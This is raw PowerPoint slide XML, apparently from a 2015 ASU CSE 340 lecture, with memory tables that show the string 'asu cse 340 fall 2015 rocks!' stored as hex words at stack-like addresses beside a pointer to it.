                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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184</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd2bc</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x6c6c6166</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x804840d</a:t>
                      </a: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18273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306246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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24464422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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)</a:t>
                      </a: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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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185</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x6c6c6166</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x31303220</a:t>
                      </a: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151112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306246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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145185644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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)</a:t>
                      </a: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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10014"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x6c6c6166</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338328">
                <a:tc>
                  <a:txBody>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
